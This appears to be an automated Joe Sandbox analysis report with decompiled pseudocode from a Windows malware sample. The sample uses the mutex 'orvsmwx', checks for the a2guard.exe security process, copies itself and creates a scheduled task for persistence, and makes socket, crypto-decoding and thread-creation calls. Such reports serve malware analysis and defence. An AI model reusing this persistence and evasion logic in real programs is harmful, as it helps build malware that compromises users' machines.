inet_addr 7333->7336 7336->7324 7338 675a75 7337->7338 7341 675a6e ExitProcess 7337->7341 7338->7305 7339 675295 7340 6765d1 6 API calls 7339->7340 7359 6752d3 7340->7359 7342 675301 select 7342->7343 7342->7359 7343->7313 7344 676670 9 API calls 7344->7359 7345 6765d1 6 API calls 7345->7359 7346 6757d7 VirtualAlloc 7346->7343 7346->7359 7347 67654a 2 API calls 7347->7359 7348 672b06 42 API calls 7348->7359 7349 675887 socket 7349->7359 7350 675894 socket 7350->7359 7351 6758c9 CreateThread 7351->7359 7498 404a1a 7351->7498 7352 6756c3 GetTempPathA 7352->7359 7359->7342 7359->7343 7359->7344 7359->7345 7359->7346 7359->7347 7359->7348 7359->7349 7359->7350 7359->7351 7359->7352 7360 675a82 10 API calls 7359->7360 7444 676dd5 7359->7444 7448 676f08 7359->7448 7453 676d84 7359->7453 7458 676f7c 7359->7458 7462 676cf4 7359->7462 7360->7359 7362 672b22 7361->7362 7364 672c58 7362->7364 7468 672fa2 7362->7468 7364->7322 7366 6713d4 7365->7366 7367 677042 GetPEB 7366->7367 7368 671404 7367->7368 7369 677132 GetPEB 7368->7369 7370 67140f 7369->7370 7371 677042 GetPEB 7370->7371 7372 67142a 7371->7372 7373 677132 GetPEB 7372->7373 7374 671435 7373->7374 7375 677042 GetPEB 7374->7375 7376 671450 7375->7376 7377 677132 GetPEB 7376->7377 7378 67145b 7377->7378 7379 677042 GetPEB 7378->7379 7380 67147c 7379->7380 7381 677132 GetPEB 7380->7381 7397 671487 7381->7397 7382 676767 GetPEB 7383 6728c9 7382->7383 7385 676726 GetPEB 7383->7385 7384 672c95 10 API calls 7384->7397 7386 672900 CryptReleaseContext 7385->7386 7387 672913 7386->7387 7388 67292d 7386->7388 7389 677042 GetPEB 7387->7389 7390 677042 GetPEB 7388->7390 7391 672922 7389->7391 7392 67293e 7390->7392 7393 677132 GetPEB 7391->7393 7394 677132 GetPEB 7392->7394 7393->7388 7395 672949 7394->7395 7396 677042 GetPEB 7395->7396 7398 67295a 7396->7398 7397->7384 7407 67163e 7397->7407 7423 671f51 7397->7423 7399 677132 GetPEB 7398->7399 7400 672965 7399->7400 7400->7319 7401 673672 19 API calls 7401->7407 7402 673206 10 API calls 7402->7407 7403 671741 CryptStringToBinaryA 7404 674b06 VirtualAlloc 7403->7404 7404->7407 7405 67357e GetPEB 7405->7407 7406 671774 CryptStringToBinaryA 7406->7407 7407->7401 7407->7402 7407->7403 7407->7405 7407->7406 7408 674b06 VirtualAlloc 7407->7408 7409 6746d4 VirtualAlloc select SetEvent 7407->7409 7410 6739c9 VirtualAlloc select SetEvent 7407->7410 7411 67273a select 7407->7411 7412 674809 VirtualAlloc select 7407->7412 7413 673b63 GetPEB 7407->7413 7414 6718fa inet_addr 7407->7414 7415 67191d CryptStringToBinaryA CryptStringToBinaryA 7407->7415 7416 6720bf CryptStringToBinaryA CryptStringToBinaryA 7407->7416 7418 672839 inet_addr 7407->7418 7419 674a04 VirtualAlloc select select 7407->7419 7421 671a54 CryptStringToBinaryA CryptStringToBinaryA 7407->7421 7422 6722e7 wsprintfA 7407->7422 7407->7423 7424 671aa8 CryptDecodeObject 7407->7424 7426 677132 GetPEB 7407->7426 7427 6723ad select 7407->7427 7428 677042 GetPEB 7407->7428 7429 673a08 GetPEB 7407->7429 7430 676726 GetPEB 7407->7430 7431 673ae2 GetPEB 7407->7431 7432 673bfa GetPEB 7407->7432 7408->7407 7409->7407 7410->7407 7411->7407 7412->7407 7413->7407 7414->7407 7417 6742b5 11 API calls 7415->7417 7416->7407 7417->7407 7420 6746d4 3 API calls 7418->7420 7419->7407 7420->7407 7421->7407 7425 673ae2 GetPEB 7422->7425 7423->7382 7424->7407 7425->7407 7426->7407 7427->7407 7428->7407 7429->7407 7430->7407 7431->7407 7432->7407 7434 6763c8 7433->7434 7435 677042 GetPEB 7434->7435 7436 6763e3 7435->7436 7437 677132 GetPEB 7436->7437 7438 67525c 7437->7438 7439 6763ff 7438->7439 7440 677042 GetPEB 7439->7440 7441 676412 7440->7441 7442 677132 GetPEB 7441->7442 7443 675265 GetVolumeInformationA 7442->7443 7443->7339 7445 676dee 7444->7445 7446 676e2e VirtualAlloc 7445->7446 7447 676e50 7446->7447 7447->7359 7451 676f21 7448->7451 7449 675651 CreateThread 7449->7359 7522 406b63 7449->7522 7450 677042 GetPEB 7450->7451 7451->7449 7451->7450 7452 677132 GetPEB 7451->7452 7452->7451 7454 677132 GetPEB 7453->7454 7455 676d95 7454->7455 7456 676dac 7455->7456 7457 676d99 CreateThread 7455->7457 7456->7359 7457->7456 7496 406b1a Sleep 7457->7496 7459 676f95 7458->7459 7460 677013 VirtualProtect CreateThread 7459->7460 7461 676fad 7459->7461 7460->7461 7461->7359 7463 676d04 CreateFileA 7462->7463 7464 676d27 7463->7464 7466 676d32 7463->7466 7464->7463 7464->7466 7465 676d63 7465->7359 7466->7465 7467 676d5b CloseHandle 7466->7467 7467->7465 7469 672fbe 7468->7469 7470 6713b8 36 API calls 7469->7470 7471 673005 7470->7471 7472 673121 7471->7472 7474 67304f wsprintfA 7471->7474 7473 676767 GetPEB 7472->7473 7475 67312e 7473->7475 7476 6743ea 6 API calls 7474->7476 7477 676726 GetPEB 7475->7477 7485 673093 7476->7485 7478 67313b 7477->7478 7480 677042 GetPEB 7478->7480 7484 67315b 7478->7484 7479 6730a5 select 7479->7472 7479->7485 7481 673150 7480->7481 7482 677132 GetPEB 7481->7482 7482->7484 7486 6731a0 VirtualAlloc 7484->7486 7487 6731be 7484->7487 7485->7472 7485->7479 7488 674518 7485->7488 7486->7487 7487->7364 7492 674531 7488->7492 7489 67454b select 7489->7492 7490 674809 2 API calls 7490->7492 7491 6746a1 7491->7485 7492->7489 7492->7490 7492->7491 7494 6745b7 7492->7494 7493 673b63 GetPEB 7493->7494 7494->7491 7494->7493 7495 6765d1 6 API calls 7494->7495 7495->7494 7497 406b2d 7496->7497 7499 404a36 7498->7499 7500 406558 2 API calls 7499->7500 7501 404b6b 7499->7501 7500->7501 7502 404bc6 ioctlsocket 7501->7502 7507 404bc1 7501->7507 7503 404bec 7502->7503 7502->7507 7504 404c02 connect 7503->7504 7505 404bf2 connect 7503->7505 7506 404c10 7504->7506 7505->7506 7508 404c25 select 7506->7508 7510 406381 11 API calls 7507->7510 7508->7507 7509 404c40 ioctlsocket WSAIoctl 7508->7509 7509->7507 7520 404cf9 7510->7520 7511 404d7b 7524 4064b7 shutdown closesocket 7511->7524 7513 404de9 7515 406381 11 API calls 7513->7515 7514 404d43 select 7514->7520 7516 404e26 7515->7516 7518 4048e1 VirtualFree 7516->7518 7517 404d5f recv 7517->7511 7517->7520 7519 404e2f 7518->7519 7520->7511 7520->7514 7520->7517 7521 406381 11 API calls 7520->7521 7521->7520 7523 406b7e 7522->7523 7524->7513 7109 404d7d 7110 404d29 7109->7110 7113 404d43 select 7110->7113 7114 404d5f recv 7110->7114 7116 404d7b 7110->7116 7120 406381 11 API calls 7110->7120 7112 404de9 7115 406381 11 API calls 7112->7115 7113->7110 7114->7110 7114->7116 7117 404e26 7115->7117 7121 4064b7 shutdown closesocket 7116->7121 7118 4048e1 VirtualFree 7117->7118 7119 404e2f 7118->7119 7120->7110 7121->7112

                            Control-flow Graph

                            C-Code - Quality: 68%
                            			_entry_() {
                            				char _v772;
                            				char _v1028;
                            				intOrPtr _v1032;
                            				void* _v1036;
                            				char _v1040;
                            				intOrPtr _t21;
                            				void* _t28;
                            				void* _t29;
                            				void* _t44;
                            				short* _t49;
                            				void* _t52;
                            				void* _t54;
                            
                            				E004066D2( &_v1040, _t52 - _t52 + 0xfffffbf4);
                            				CreateThread(0, 0, E00406004, E00406122, 0, 0); // executed
                            				GetModuleFileNameA(0,  &_v1028, 0x100);
                            				_t21 = E0040629B(_t54, "start"); // executed
                            				_v1032 = _t21;
                            				_t22 = _t21;
                            				if(_t21 == 0) {
                            					_t7 = E00406A32(_t22, 4) + 4; // 0x4
                            					_t44 = _t7;
                            					do {
                            						_t23 = E00406A32(_t23, 0x18) + 0x61;
                            						asm("stosb");
                            						_t44 = _t44 - 1;
                            						__eflags = _t44;
                            					} while (_t44 != 0);
                            					L6:
                            					_v1036 = OpenMutexA(0x100000, 0, "orvsmwx");
                            					CreateMutexA(0, 0, "orvsmwx"); // executed
                            					if(_v1032 == 0) {
                            						L9:
                            						EnumWindows(E00405DB5, 0); // executed
                            						Sleep(0x2710); // executed
                            						_t28 = E004061E1(); // executed
                            						_t59 = _t28 - 0x1000;
                            						if(_t28 == 0x1000) {
                            							L8:
                            							E0040490E();
                            							goto L9;
                            						}
                            						_t29 = E00405C22(_t59, "a2guard.exe"); // executed
                            						_t60 = _t29;
                            						if(_t29 == 0) {
                            							GetModuleFileNameA(0,  &_v1028, 0x100);
                            							E00405D44(_t60,  &_v772, "orvsmwx"); // executed
                            							CopyFileA( &_v1028,  &_v772, 0); // executed
                            							E00405832(_t60, "orvsmwx", 0,  &_v772, "start", 0, 1); // executed
                            						}
                            						L12:
                            						Sleep(0xea60); // executed
                            						ExitProcess(0); // executed
                            						return CreateWindowExA();
                            					}
                            					if(_v1036 != 0) {
                            						goto L12;
                            					}
                            					goto L8;
                            				}
                            				_t49 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x30));
                            				do {
                            					asm("movsb");
                            					_t49 = _t49 + 1;
                            				} while ( *_t49 != 0x2e);
                            				goto L6;
                            			}















                            0x00401014
                            0x0040102b
                            0x0040103e
                            0x00401048
                            0x0040104d
                            0x00401053
                            0x00401055
                            0x00401083
                            0x00401083
                            0x00401086
                            0x0040108d
                            0x00401090
                            0x00401091
                            0x00401091
                            0x00401091
                            0x00401094
                            0x004010a5
                            0x004010b4
                            0x004010c0
                            0x004010d4
                            0x004010db
                            0x004010e5
                            0x004010ea
                            0x004010ef
                            0x004010f4
                            0x004010cf
                            0x004010cf
                            0x00000000
                            0x004010cf
                            0x004010fb
                            0x00401100
                            0x00401102
                            0x00401112
                            0x00401123
                            0x00401138
                            0x00401154
                            0x00401154
                            0x00401159
                            0x0040115e
                            0x00406fe7
                            0x00406fec
                            0x00406fec
                            0x004010c9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004010c9
                            0x00401063
                            0x0040106c
                            0x0040106c
                            0x0040106d
                            0x0040106e
                            0x00000000

                            APIs
                            • CreateThread.KERNEL32 ref: 0040102B
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000,00000000,00406004,00406122,00000000,00000000,?), ref: 0040103E
                              • Part of subcall function 0040629B: GetCommandLineW.KERNEL32(?,?), ref: 004062B7
                              • Part of subcall function 0040629B: CommandLineToArgvW.SHELL32(00000000,?,?,?), ref: 004062C5
                            • OpenMutexA.KERNEL32 ref: 004010A0
                            • CreateMutexA.KERNEL32(00000000,00000000,orvsmwx,00100000,00000000,orvsmwx,00000018,00000004,start,00000000,?,00000100,00000000,00000000,00406004,00406122), ref: 004010B4
                            • EnumWindows.USER32(00405DB5,00000000), ref: 004010DB
                            • Sleep.KERNEL32(00002710), ref: 004010E5
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000100,a2guard.exe,00002710,00405DB5,00000000,00002710), ref: 00401112
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00401138
                            • Sleep.KERNEL32(0000EA60,a2guard.exe,00002710,00405DB5,00000000,00002710), ref: 0040115E
                            • ExitProcess.KERNEL32(00000000,0000EA60,a2guard.exe,00002710,00405DB5,00000000,00002710), ref: 00406FE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CommandCreateLineModuleMutexNameSleep$ArgvCopyEnumExitOpenProcessThreadWindows
                            • String ID: a2guard.exe$orvsmwx$start
                            • API String ID: 1578829165-2223297755
                            • Opcode ID: 1564a09994389c12c790aa1c56f8f0923b713c99f736ce34b054b87e389707f8
                            • Instruction ID: d1cc41d46dd628a9a50eddfed4807871f681f71730b1e77f83a00c1e3dac253f
                            • Opcode Fuzzy Hash: 1564a09994389c12c790aa1c56f8f0923b713c99f736ce34b054b87e389707f8
                            • Instruction Fuzzy Hash: D8319970B84309BAF720B7618C47F9A7358AB44B08F11447BB7457E1D3D9FC6A818A2E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 129 405832-4058af call 4068d9 * 2 call 405b81 CoInitialize call 4066e9 * 2 CoCreateInstance 140 405b75-405b7e CoUninitialize 129->140 141 4058b5-405902 call 4066e9 * 2 129->141 147 405908-405933 call 4066d2 call 4061e1 141->147 148 405b6a-405b72 141->148 154 405935-40593a 147->154 155 40593c-40593d 147->155 148->140 154->155 156 40593f-405959 GetUserNameExW 154->156 157 40595e-40598b 155->157 156->157 160 4059b1-4059e0 157->160 161 40598d-4059ae call 4068d9 157->161 166 4059e6-405a1c call 4066d2 GetLocalTime SystemTimeToFileTime 160->166 167 405b5f-405b67 160->167 161->160 170 405a23-405a48 FileTimeToSystemTime 166->170 171 405a1e 166->171 167->148 172 405a4a-405a65 170->172 173 405a6f-405b1e call 4066e9 170->173 171->170 172->173 178 405b20-405b36 173->178 179 405b51-405b5c 173->179 181 405b43-405b4e 178->181 182 405b38-405b40 178->182 179->167 181->179 182->181
                            C-Code - Quality: 74%
                            			E00405832(void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                            				void* _v8;
                            				void* _v12;
                            				char _v1032;
                            				char _v1036;
                            				void* _v1040;
                            				char _v1044;
                            				char _v1056;
                            				short _v1060;
                            				intOrPtr _v1068;
                            				intOrPtr _v1072;
                            				short _v1074;
                            				short _v1076;
                            				short _v1078;
                            				short _v1080;
                            				short _v1082;
                            				short _v1084;
                            				short _v1086;
                            				short _v1088;
                            				char _v1092;
                            				void* _v1096;
                            				struct _SYSTEMTIME _v1112;
                            				struct _FILETIME _v1120;
                            				char _v1376;
                            				char _v1888;
                            				char _v2144;
                            				char _v2400;
                            				char _v2656;
                            				char _v2912;
                            				char _v3168;
                            				char _v3424;
                            				char* _t102;
                            				intOrPtr* _t111;
                            				void* _t113;
                            				intOrPtr* _t114;
                            				intOrPtr* _t115;
                            				void* _t120;
                            				intOrPtr* _t122;
                            				intOrPtr* _t126;
                            				intOrPtr* _t128;
                            				intOrPtr* _t132;
                            				intOrPtr* _t135;
                            				void* _t143;
                            				short _t151;
                            				intOrPtr* _t154;
                            				intOrPtr* _t160;
                            				intOrPtr* _t163;
                            				intOrPtr* _t165;
                            				intOrPtr* _t167;
                            				intOrPtr* _t169;
                            				intOrPtr* _t174;
                            
                            				E004068D9(__eflags, _a4,  &_v1376);
                            				E004068D9(__eflags, _a12,  &_v1888);
                            				E00405B81(__eflags, _a4); // executed
                            				_push(0);
                            				L004071BA();
                            				E004066E9(0x4090c5, 0x10,  &_v2400);
                            				E004066E9(0x4090d5, 0x10,  &_v2656);
                            				_push( &_v8);
                            				_push( &_v2656);
                            				_push(1);
                            				_push(0);
                            				_t102 =  &_v2400;
                            				_push(_t102);
                            				L004071B4();
                            				if(_t102 >= 0) {
                            					E004066E9(0x4090e5, 0x10,  &_v2912);
                            					E004066E9(0x4090f5, 0x10,  &_v3168);
                            					_t111 = _v8;
                            					_t113 =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x20))))(_t111,  &_v1376,  &_v3168,  &_v2912,  &_v12); // executed
                            					if(_t113 >= 0) {
                            						_t115 = _v12;
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0x70))))(_t115, 0x2202);
                            						E004066D2( &_v1036, 0x400); // executed
                            						_t120 = E004061E1(); // executed
                            						if(_t120 != 0x4000 && _t120 != 0x3000) {
                            							_v1036 = 0x100;
                            							_push( &_v1036);
                            							_push( &_v1032);
                            							_push(2);
                            							L004071F0();
                            						}
                            						_t122 = _v12;
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x78))))(_t122,  &_v1032, 0);
                            						_t126 = _v12;
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x80))))(_t126,  &_v1888); // executed
                            						_t209 = _a16;
                            						if(_a16 != 0) {
                            							E004068D9(_t209, _a16,  &_v2144);
                            							_t174 = _v12;
                            							 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 0x88))))(_t174,  &_v2144);
                            						}
                            						_t128 = _v12;
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0xa8))))(_t128, 0xd65cb580);
                            						_push( &_v1040);
                            						_push( &_v1044);
                            						_t132 = _v12;
                            						_push(_t132);
                            						if( *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0xc))))() >= 0) {
                            							E004066D2( &_v1092, 0x30);
                            							GetLocalTime( &_v1112);
                            							SystemTimeToFileTime( &_v1112,  &_v1120);
                            							_t143 = 0x47868c00;
                            							if(_a20 == 1) {
                            								_t143 = 0x29b92700;
                            							}
                            							_v1120.dwLowDateTime = _v1120.dwLowDateTime + _t143;
                            							asm("adc [ebp-0x458], edx");
                            							FileTimeToSystemTime( &_v1120,  &_v1112);
                            							if(_a20 == 0) {
                            								_v1060 = 1;
                            								_v1056 = 1;
                            								_v1072 = 0x5a0;
                            								_v1068 = 2;
                            							}
                            							_v1092 = 0x30;
                            							_v1074 = _v1112.wMinute;
                            							_v1076 = _v1112.wHour;
                            							_v1084 = _v1112.wDay;
                            							_v1086 = _v1112.wMonth;
                            							_t151 = _v1112.wYear;
                            							_v1088 = _t151;
                            							_v1082 = _t151 + 0x64;
                            							_v1080 = 1;
                            							_v1078 = 1;
                            							_t154 = _v1040;
                            							 *((intOrPtr*)( *((intOrPtr*)( *_t154 + 0xc))))(_t154,  &_v1092);
                            							E004066E9(0x409105, 0x10,  &_v3424);
                            							_push( &_v1096);
                            							_push( &_v3424);
                            							_t160 = _v12;
                            							_push(_t160);
                            							if( *((intOrPtr*)( *((intOrPtr*)( *_t160))))() >= 0) {
                            								_t165 = _v1096;
                            								 *((intOrPtr*)( *((intOrPtr*)( *_t165 + 0x18))))(_t165, 0, 1); // executed
                            								if(_a24 != 0) {
                            									_t169 = _v12;
                            									 *((intOrPtr*)( *((intOrPtr*)( *_t169 + 0x30))))(_t169); // executed
                            								}
                            								_t167 = _v1096;
                            								 *((intOrPtr*)( *((intOrPtr*)( *_t167 + 8))))(_t167);
                            							}
                            							_t163 = _v1040;
                            							 *((intOrPtr*)( *((intOrPtr*)( *_t163 + 8))))(_t163);
                            						}
                            						_t135 = _v12;
                            						 *((intOrPtr*)( *((intOrPtr*)( *_t135 + 8))))(_t135);
                            					}
                            					_t114 = _v8;
                            					_t102 =  *((intOrPtr*)( *((intOrPtr*)( *_t114 + 8))))(_t114);
                            				}
                            				L004071C0();
                            				return _t102;
                            			}





















































                            0x00405848
                            0x00405857
                            0x0040585f
                            0x00405864
                            0x00405866
                            0x00405879
                            0x0040588c
                            0x00405894
                            0x0040589b
                            0x0040589c
                            0x0040589e
                            0x004058a0
                            0x004058a6
                            0x004058a7
                            0x004058af
                            0x004058c3
                            0x004058d6
                            0x004058f4
                            0x004058fd
                            0x00405902
                            0x0040590d
                            0x00405916
                            0x00405924
                            0x00405929
                            0x00405933
                            0x0040593f
                            0x0040594f
                            0x00405956
                            0x00405957
                            0x00405959
                            0x00405959
                            0x00405967
                            0x00405970
                            0x00405979
                            0x00405985
                            0x00405987
                            0x0040598b
                            0x00405997
                            0x004059a3
                            0x004059af
                            0x004059af
                            0x004059b6
                            0x004059c2
                            0x004059ca
                            0x004059d1
                            0x004059d2
                            0x004059d7
                            0x004059e0
                            0x004059ef
                            0x004059fb
                            0x00405a0e
                            0x00405a13
                            0x00405a1c
                            0x00405a1e
                            0x00405a1e
                            0x00405a25
                            0x00405a2b
                            0x00405a3f
                            0x00405a48
                            0x00405a4a
                            0x00405a54
                            0x00405a5b
                            0x00405a65
                            0x00405a65
                            0x00405a6f
                            0x00405a7f
                            0x00405a8d
                            0x00405a9b
                            0x00405aa9
                            0x00405ab0
                            0x00405ab7
                            0x00405ac2
                            0x00405ac9
                            0x00405ad2
                            0x00405ae2
                            0x00405aee
                            0x00405afe
                            0x00405b09
                            0x00405b10
                            0x00405b11
                            0x00405b16
                            0x00405b1e
                            0x00405b24
                            0x00405b30
                            0x00405b36
                            0x00405b38
                            0x00405b41
                            0x00405b41
                            0x00405b43
                            0x00405b4f
                            0x00405b4f
                            0x00405b51
                            0x00405b5d
                            0x00405b5d
                            0x00405b5f
                            0x00405b68
                            0x00405b68
                            0x00405b6a
                            0x00405b73
                            0x00405b73
                            0x00405b75
                            0x00405b7e

                            APIs
                              • Part of subcall function 00405B81: CoInitialize.OLE32(00000000), ref: 00405B9F
                              • Part of subcall function 00405B81: CoCreateInstance.OLE32(?,00000000,00000001,?,?,004090D5,00000010,?,004090C5,00000010,?,?,?,?,?,000000C7), ref: 00405BE0
                              • Part of subcall function 00405B81: CoUninitialize.OLE32(?,00000000,00000001,?,?,004090D5,00000010,?,004090C5,00000010,?,?,?,?,?,000000C7), ref: 00405C16
                            • CoInitialize.OLE32(00000000), ref: 00405866
                            • CoCreateInstance.OLE32(?,00000000,00000001,?,?,004090D5,00000010,?,004090C5,00000010,?,00000000,?,?,?,?), ref: 004058A7
                            • CoUninitialize.OLE32(?,00000000,00000001,?,?,004090D5,00000010,?,004090C5,00000010,?,00000000,?,?,?,?), ref: 00405B75
                              • Part of subcall function 004061E1: GetCurrentProcess.KERNEL32(?,orvsmwx,00000003), ref: 004061F8
                              • Part of subcall function 004061E1: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,orvsmwx,00000003), ref: 00406206
                              • Part of subcall function 004061E1: LocalAlloc.KERNEL32(00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 00406218
                              • Part of subcall function 004061E1: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 0040622F
                              • Part of subcall function 004061E1: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 0040623D
                              • Part of subcall function 004061E1: LocalAlloc.KERNEL32(00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 00406247
                              • Part of subcall function 004061E1: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000), ref: 0040625E
                              • Part of subcall function 004061E1: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 0040626E
                              • Part of subcall function 004061E1: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 00406286
                              • Part of subcall function 004061E1: CloseHandle.KERNEL32(?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?,?,orvsmwx,00000003), ref: 0040628E
                            • GetUserNameExW.SECUR32(00000002,?,?,?,00000400,?,0040556D,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 00405959
                            • GetLocalTime.KERNEL32(?,?,00000030,?,0040556D,?,00000014,?,00000000,00000001,00000000,00000018,?,?,?,00000002), ref: 004059FB
                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,00000030,?,0040556D,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 00405A0E
                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00000030,?,0040556D,?,00000014,?,00000000,00000001,00000000,00000018), ref: 00405A3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime$Token$AllocCreateFileFreeInformationInitializeInstanceProcessSystemUninitialize$AuthorityCloseCurrentHandleNameOpenUser
                            • String ID: 0
                            • API String ID: 1653648096-4108050209
                            • Opcode ID: c686f755bdf1e39982c1454a3e7c8e1e44bc1fa9189fb24b5cfb18d335d6731f
                            • Instruction ID: 4ed8c24e1e53c24dfdbf1185890515f3868c95ababa1bf71d62bcb2bd1a1986c
                            • Opcode Fuzzy Hash: c686f755bdf1e39982c1454a3e7c8e1e44bc1fa9189fb24b5cfb18d335d6731f
                            • Instruction Fuzzy Hash: BAA1FCB5900618AFDB10DB94CC85FDAB3BCEF48304F1041EAE609E7291D675AE85CF69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 267 405c22-405c5e call 4066d2 call 4066e9 CreateToolhelp32Snapshot 272 405c64-405ca0 call 4066d2 call 406df2 call 406ee2 Process32First 267->272 273 405d37-405d41 267->273 280 405d27-405d29 272->280 281 405ca5-405cce call 40690b call 40664b 280->281 282 405d2f-405d32 CloseHandle 280->282 287 405cde-405ce1 281->287 282->273 288 405cd0-405cd3 287->288 289 405ce3-405cf8 call 406926 287->289 290 405cd5-405cd8 288->290 291 405cdd 288->291 295 405d06-405d25 call 406df2 call 406ee2 289->295 296 405cfa-405d04 289->296 290->291 293 405cda 290->293 291->287 293->291 295->280 296->282
                            C-Code - Quality: 93%
                            			E00405C22(void* __eflags, intOrPtr _a4) {
                            				void* _v8;
                            				char _v16;
                            				char _v268;
                            				void* _v304;
                            				char _v560;
                            				char _v816;
                            				char _v820;
                            				void* _t26;
                            				int _t33;
                            				char _t43;
                            				char* _t50;
                            				void* _t51;
                            
                            				E004066D2( &_v820,  &_v16 - _t51);
                            				E004066E9(_a4, 0xffffffff,  &_v560);
                            				_t26 = CreateToolhelp32Snapshot(2, 0); // executed
                            				_v8 = _t26;
                            				_t53 = _t26 - 0xffffffff;
                            				if(_t26 == 0xffffffff) {
                            					L13:
                            					return _v820;
                            				}
                            				E004066D2( &_v304, 0x128);
                            				_v304 = 0x128;
                            				E00406EE2(_t53, E00406DF2("kernel32.dll"), "Process32First"); // executed
                            				_t33 = Process32First(_v8,  &_v304); // executed
                            				while(_t33 != 0) {
                            					E0040664B( &_v268,  &_v816, E0040690B(__eflags,  &_v268) + 1);
                            					_t50 =  &_v816;
                            					while(1) {
                            						__eflags =  *_t50;
                            						if(__eflags == 0) {
                            							break;
                            						}
                            						__eflags =  *_t50 - 0x40;
                            						if( *_t50 > 0x40) {
                            							__eflags =  *_t50 - 0x5b;
                            							if( *_t50 < 0x5b) {
                            								 *_t50 =  *_t50 + 0x20;
                            								__eflags =  *_t50;
                            							}
                            						}
                            						_t50 = _t50 + 1;
                            						__eflags = _t50;
                            					}
                            					_t43 = E00406926(__eflags,  &_v816,  &_v560);
                            					__eflags = _t43;
                            					if(_t43 == 0) {
                            						_push( &_v304);
                            						_push(_v8);
                            						_t33 =  *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("kernel32.dll"), "Process32Next")))();
                            						continue;
                            					}
                            					_v820 = 1;
                            					break;
                            				}
                            				CloseHandle(_v8); // executed
                            				goto L13;
                            			}















                            0x00405c39
                            0x00405c4a
                            0x00405c53
                            0x00405c58
                            0x00405c5b
                            0x00405c5e
                            0x00405d37
                            0x00405d41
                            0x00405d41
                            0x00405c70
                            0x00405c75
                            0x00405c99
                            0x00405c9e
                            0x00405d27
                            0x00405cc3
                            0x00405cc8
                            0x00405cde
                            0x00405cde
                            0x00405ce1
                            0x00000000
                            0x00000000
                            0x00405cd0
                            0x00405cd3
                            0x00405cd5
                            0x00405cd8
                            0x00405cda
                            0x00405cda
                            0x00405cda
                            0x00405cd8
                            0x00405cdd
                            0x00405cdd
                            0x00405cdd
                            0x00405cf1
                            0x00405cf6
                            0x00405cf8
                            0x00405d0c
                            0x00405d0d
                            0x00405d25
                            0x00000000
                            0x00405d25
                            0x00405cfa
                            0x00000000
                            0x00405cfa
                            0x00405d32
                            0x00000000

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00405C53
                            • Process32First.KERNEL32(00000000,Process32First,kernel32.dll,?,?,?,00000128,?,000000FF,?,?,?,orvsmwx,?,00000003), ref: 00405C9E
                            • CloseHandle.KERNEL32(?,?,00000003), ref: 00405D32
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                            • String ID: Process32First$Process32Next$kernel32.dll$orvsmwx
                            • API String ID: 1083639309-2465180310
                            • Opcode ID: 0b6b0add97ecafb345920e5dd05336f13e6089d060fa475ca454665a776cbf4f
                            • Instruction ID: fb24cc0d0821428469d9c4020bed10aa43447eb5f65a7c4c6a80d054306b612c
                            • Opcode Fuzzy Hash: 0b6b0add97ecafb345920e5dd05336f13e6089d060fa475ca454665a776cbf4f
                            • Instruction Fuzzy Hash: C9317171D042196AEB11EBA1CC45FDFB6ACDF04314F2045BBB246B20C1EB399B548F69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
